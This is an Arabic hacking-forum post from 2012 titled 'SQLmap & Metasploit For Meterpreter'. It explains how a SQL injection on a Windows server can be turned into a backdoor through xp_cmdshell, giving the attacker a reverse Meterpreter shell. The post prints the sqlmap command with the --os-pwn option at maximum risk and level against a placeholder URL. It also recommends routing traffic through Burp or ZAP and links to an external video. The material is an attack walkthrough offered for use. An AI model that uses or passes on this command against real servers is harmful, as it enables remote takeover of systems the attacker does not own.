بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
اليوم بآذن الله بنعرف في حالة كانت في امكانية لرفع شيل على
السيرفرات ( ويندوز ) وتشغيل بايلود Meterpreter
طبعا هون التجربة على سيرفرات الويندوز بـطريقـة : Xp_cmdShell
وعن طريق باك دور بـ exe طبعا
على السيرفر الفكره وما فيها عبآرة عن آمر واحد
كود PHP:
cd /pentest/database/sqlmap
كود PHP:
./sqlmap.py -u 'http://www.site.com/index.php?id=1' --risk=5 --level=5 --os-pwn
يعني في حالت تم الحقن وفية امكانية لرفع باك دور
والاتصال العكسي بالسيرفر بهي الطريقة الي تشوفها
ولازم معظم الاوقات انك تستخدم بروكسي Brubsiute , Zap Proxy
وحفظ النتائج والحقن خلالها كما شرحت في موضوع سابق ْ
امامك والموضوع للمعلومية وبشرح تبين المعلومة آكثر واكثر
كود PHP:
http://www.gulfup.com/?9HhEAS
يالله لاتنسوني من صالح دعائكم
اتمنى لكم الفائده
كل ودي في امان الله
12-11-2012, 02:27 PM
SQLmap & Metasploit For Meterpreter
العرض الشجري